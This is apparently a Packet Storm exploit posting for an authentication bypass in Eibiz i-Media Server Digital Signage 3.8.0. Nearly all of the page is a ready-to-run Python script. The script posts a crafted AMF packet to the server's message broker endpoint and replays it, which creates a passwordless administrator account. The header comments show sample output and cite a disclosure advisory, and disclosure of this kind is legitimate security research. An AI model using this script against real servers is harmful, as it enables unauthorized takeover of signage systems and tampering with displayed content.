exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass

Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass
Posted Aug 21, 2020
Authored by LiquidWorm | Site zeroscience.mk

Eibiz i-Media Server Digital Signage version 3.8.0 suffers from unauthenticated privilege escalation and arbitrary user creation vulnerability that allows authentication bypass. Once serialized, an AMF encoded object graph may be used to persist and retrieve application state or allow two endpoints to communicate through the exchange of strongly typed data. These objects are received by the server without validation and authentication and gives the attacker the ability to create any user with any role and bypass the security control in place and modify presented data on the screen/billboard.

tags | exploit, arbitrary
SHA-256 | 21b41f43af648dca662d0ab37642578564bfab81368e243c65e5691dcaa6ebde

Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass

Change Mirror Download
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)
#
#
# Vendor: EIBIZ Co.,Ltd.
# Product web page: http://www.eibiz.co.th
# Affected version: <=3.8.0
#
# Summary: EIBIZ develop advertising platform for out of home media in that
# time the world called "Digital Signage". Because most business customers
# still need get outside to get in touch which products and services. Online
# media alone cannot serve them right place, right time.
#
# Desc: The application suffers from unauthenticated privilege escalation and
# arbitrary user creation vulnerability that allows authentication bypass.
# Once serialized, an AMF encoded object graph may be used to persist and retrieve
# application state or allow two endpoints to communicate through the exchange
# of strongly typed data. These objects are received by the server without validation
# and authentication and gives the attacker the ability to create any user with
# any role and bypass the security control in place and modify presented data on
# the screen/billboard.
#
# =========================================================================================
#
# # python3 imedia_createUser.py 192.168.1.1 waddup
#
# --Sending serialized object...
# --Replaying...
#
# ------------------------------------------------------
# Admin user 'waddup' successfully created. No password.
# ------------------------------------------------------
#
# =========================================================================================
#
# Tested on: Windows Server 2016
# Windows Server 2012 R2
# Windows Server 2008 R2
# Apache Flex
# Apache Tomcat/6.0.14
# Apache-Coyote/1.1
# BlazeDS Application
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5586
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php
#
#
# 26.07.2020
#
#

import time as go
import requests
import sys
import re

class __CreateAdmin__:

def __init__(self):
self.ep = "/messagebroker/amf"
self.agent = "CharlieChaplin"
self.amfpacket = None
self.bytecount = None
self.bytesdata = None
self.address = None
self.headers = None
self.usrname = None
self.ende = None

def usage(self):
if len(sys.argv) != 3:
self.me()
msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin"
brd = "-" * len(msg + "\x20")
print("\n" + brd)
print(msg)
print("\x20Usage: ./i-media.py [ip] [username]")
print(brd)
exit(12)
else:
self.address = sys.argv[1]
self.usrname = sys.argv[2]
if not "http" in self.address:
self.address = "http://{}".format(self.address)

def amf(self):
self.headers = {"User-Agent" : self.agent,
"Accept" : "*/*",
"Accept-Language" : "en-US,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Origin" : self.address,
"Connection" : "close",
"Referer" : self.address + "/main.swf",
"Content-Type" : "application/x-amf"}

self.amfpacket = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E"
self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00"
self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11"
self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"
self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67"
self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73"
self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67"
self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"
self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65"
self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69"
self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62"
self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E"
self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65"
self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F"
self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74"
self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D"
self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01"
self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55"
self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A"
self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64"
self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70"
self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63"
self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C"
self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65"
self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D"
self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64"
self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75"
self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65"
self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09"
self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64"
self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F"
self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06"
self.amfpacket += b"\x01\x06\x01\x06" ##################"
self.bytecount = len(self.usrname * 2) + 1
self.bytesdata = [self.bytecount]
self.amfpacket += "".join(map(chr, self.bytesdata))
self.amfpacket += (bytes(self.usrname.encode("utf-8")))
self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06"
self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69"
self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06"
self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44"
self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74"
self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09"
self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42"
self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31"
self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31"
self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33"
self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00"
self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72"
self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46"
self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38"
self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41"
self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45"
self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########"

print("\n--Sending serialized object...")
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
#print(req.text.encode("utf-8"))
go.sleep(2)
print("--Replaying...")
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)
#print(req.text.encode("utf-8"))
self.ende = "Admin user '" + self.usrname + "' successfully created. No password."
print
print("-" * len(self.ende))
print(self.ende)
print("-" * len(self.ende))

def me(self):
cc = """

/`,.,,,.
:.......,,
,.........7
,.........$
......:=+=$
I.....,,:~,.:
$.?7IZDDNNN~.
$$: 8D=:I D,
D~,7NI7DNN
DDD NNN:
D8.ININ;
D8?7DZS
.ZDNNND D
S..,.~8?,N OO77
N......,..$=77:+?=~8
:......,::=.I8?:+=.=+~++
=.......,:+$=+O:+==~~++++=
8...........~7D$::~..~====:++
I.............:+.....~~~=~:~+?
N,............. .+...,:~=+~~ :+=$
;....... ......, .,....,:=+:,..~=?
Z,,...... :............,::~~=...===I
=.......$ Z...... =~,,,,.,:~,...,7~=
+....... 8.....,.=~~~:.~~~=:~ ..:$==
,...... +,..,,:.=~:~+I:,+I=8:...=?~
,....., =...,,,8+=,:~=~I=~~ N...:+?
,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=?
8...... ,...7=Z$DN:?::=I~~$ =..,=+
...,..D ,....O88D,8D,:=:==+?? ...,:7
,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+
......8D .. .... :?~8D:.:~~=++ ..,~II
:....~D+: . . . ..,..==~===N +,.,=$
,. DDND.......... .,...,===+=N ..,+?Z
DD 88 .......... ....,..~+=~N ..,~?I
....... ,,.,,.:...=?? 8..~=I$
....... ...,,,,. ,:~= ..:=~?
........ ,.,,..,:.. I.:+?+D
....... .......,:,,8 ,..IN
........ .,.. ..,,:.: :8N
........ ... ..,::,, I+O
........ ......,:,. O.ZN
........ . . ...,,,,. D+
............ ....,,,. =
....... . ....,,, ?
....... .....,,, 7
...... . ..,,,, +
:..... ..,.,, 8
:....... =. .....,,,N 8
~....... D. .....,,,D 8
~....... D. . ...,,,O D
=.... .....,,Z ?`
+...... . :........,.$ +
I...... ........,.7 =
Z........ . . ....,,7 D
N..... ... . ........I 8
..... ... , ........I 8
...... . = .. .....I 7
:.. . ..7 8... .....I ?
Z.. D .. ....7 N NND88OOOOOOO88DN
O.. . .. ....O O D8OZ$77II777$$ZO8DN
... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN
.,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N
$.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN
... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N
Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N
=.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN
... .?, I777IIIIIIIII7$~O8N NNNNN
8.... .I. ...7IIIIII7$Z8DD NNNNN
NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN
N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN
?,:..:,.=N I.....,,=I+ N8
~....,8

"""

j = 0
while j < len(cc):
char = cc[j]
sys.stdout.write(char)
go.sleep(10.0 / 100000.0)
j = j + 1

def main(self):
self.usage()
self.amf()

if __name__ == '__main__':
__CreateAdmin__().main()
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    32 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close